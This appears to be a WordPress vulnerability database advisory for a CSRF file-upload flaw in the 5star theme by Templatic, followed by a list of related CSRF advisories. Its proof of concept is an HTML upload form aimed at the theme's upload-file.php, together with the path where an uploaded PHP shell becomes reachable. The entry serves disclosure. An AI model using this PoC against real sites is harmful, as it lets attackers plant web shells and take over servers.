5star by Templatic – CSRF File Upload | Theme Vulnerabilities

Description

The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.

Proof of Concept

<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php">
<input name="uploadfile[]" type="file" />
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>

File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php

Affects Themes

No known fix

References

URL

https://en.0day.today/exploits/22091

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Jje Incovers

Verified

No

WPVDB ID

80537e03-34fd-47c7-8a8c-6002b109a726

Timeline

Publicly Published

2014-08-01 (about 9 years ago)

Added

2014-08-01 (about 9 years ago)

Last Updated

2021-01-13 (about 3 years ago)

Other

Published

Title

Published

2014-09-18

Title

Easy Forms for MailChimp 5.0.3 - classes/class.yksemeBase.php Multiple Actions CSRF

Published

2024-03-13

Title

Related Posts for WordPress < 2.2.2 - Cross-Site Request Forgery

Published

2021-09-15

Title

Compact WP Audio Player < 1.9.7 - Setting Change via CSRF

Published

2024-02-12

Title

SMTP Mail Plugin < 1.3.21 - Cross Site Request Forgery

Published

2023-03-15

Title

Contact Form 7 Redirect & Thank You Page < 1.0.4 - Cross-Site Request Forgery